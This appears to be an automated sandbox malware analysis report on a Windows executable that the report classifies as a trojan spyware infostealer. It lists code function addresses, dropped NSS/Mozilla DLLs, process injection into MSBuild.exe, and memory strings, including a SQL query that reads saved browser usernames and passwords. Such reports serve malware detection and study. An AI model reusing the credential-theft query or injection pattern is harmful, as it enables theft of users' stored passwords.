Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C29F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C29F280
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C3DEE70 0_2_6C3DEE70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C420E20 0_2_6C420E20
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C3C6E90 0_2_6C3C6E90
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C34AEC0 0_2_6C34AEC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C3E0EC0 0_2_6C3E0EC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C346F10 0_2_6C346F10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C402F70 0_2_6C402F70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C480F20 0_2_6C480F20
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C3AEF40 0_2_6C3AEF40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C34EFB0 0_2_6C34EFB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C41EFF0 0_2_6C41EFF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C340FE0 0_2_6C340FE0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C488FB0 0_2_6C488FB0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C414840 0_2_6C414840
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C390820 0_2_6C390820
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C3CA820 0_2_6C3CA820
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_014BE118 4_2_014BE118
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_014BEE80 4_2_014BEE80
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_014B3BC1 4_2_014B3BC1
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_014B3C28 4_2_014B3C28
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_014B3E71 4_2_014B3E71
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_014B3E80 4_2_014B3E80
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B4948 4_2_054B4948
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B2106 4_2_054B2106
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B7D20 4_2_054B7D20
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B9470 4_2_054B9470
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054BBC91 4_2_054BBC91
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B9EC8 4_2_054B9EC8
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054BCD50 4_2_054BCD50
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054BCD60 4_2_054BCD60
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B7D10 4_2_054B7D10
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B4939 4_2_054B4939
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B2C38 4_2_054B2C38
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B5C88 4_2_054B5C88
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054BA758 4_2_054BA758
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054BB230 4_2_054BB230
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_054B9EB7 4_2_054B9EB7
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_05A61B10 4_2_05A61B10
Source: C:\ProgramData\EHDHIDAEHC.exe Code function: 4_2_05A63036 4_2_05A63036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0041BD50 6_2_0041BD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0041A130 6_2_0041A130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00419B58 6_2_00419B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00419B30 6_2_00419B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE24CF0 6_2_1FE24CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE112A8 6_2_1FE112A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF79CC0 6_2_1FF79CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1292D 6_2_1FE1292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF39A20 6_2_1FF39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEC5940 6_2_1FEC5940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE11C9E 6_2_1FE11C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE13E3B 6_2_1FE13E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FECD6D0 6_2_1FECD6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEB9690 6_2_1FEB9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF79430 6_2_1FF79430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEA53B0 6_2_1FEA53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FFED209 6_2_1FFED209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF35040 6_2_1FF35040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE29000 6_2_1FE29000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE38D2A 6_2_1FE38D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF14A60 6_2_1FF14A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE11EF1 6_2_1FE11EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE38763 6_2_1FE38763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE74760 6_2_1FE74760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEA8760 6_2_1FEA8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE38680 6_2_1FE38680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF50480 6_2_1FF50480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE13AB2 6_2_1FE13AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE98120 6_2_1FE98120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE90090 6_2_1FE90090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF38030 6_2_1FF38030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1290A 6_2_1FE1290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE3BAB0 6_2_1FE3BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1251D 6_2_1FE1251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE43370 6_2_1FE43370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1F160 6_2_1FE1F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1174E 6_2_1FE1174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE72EE0 6_2_1FE72EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FFEAEBE 6_2_1FFEAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE56E80 6_2_1FE56E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE119DD 6_2_1FE119DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE13580 6_2_1FE13580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1EA80 6_2_1FE1EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1AA40 6_2_1FE1AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FEF69C0 6_2_1FEF69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF0A940 6_2_1FF0A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF2A900 6_2_1FF2A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1481D 6_2_1FE1481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF4E800 6_2_1FF4E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE266C0 6_2_1FE266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE12018 6_2_1FE12018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FF0A590 6_2_1FF0A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE3A560 6_2_1FE3A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE147AF 6_2_1FE147AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE9A0B0 6_2_1FE9A0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE1209F 6_2_1FE1209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE12AA9 6_2_1FE12AA9
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 1FE11C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 1FE1395E appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 1FE13AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 1FE11F5A appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 1FE1415B appears 133 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 1FFF06B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00402000 appears 287 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: String function: 6C4C09D0 appears 57 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: String function: 6C2D94D0 appears 90 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: String function: 003D2000 appears 287 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: String function: 6C2CCBE8 appears 134 times
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2191144720.000000003B838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207383675.000000006C515000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2197298605.0000000047710000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206892942.000000006C322000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.40d0dd0.11.raw.unpack, RnDmD.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/24@3/4
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C2F7030
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E1400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification, 0_2_003E1400
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E0900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear, 0_2_003E0900
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199747278259[1].htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
Source: C:\ProgramData\EHDHIDAEHC.exe Mutant created: NULL
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
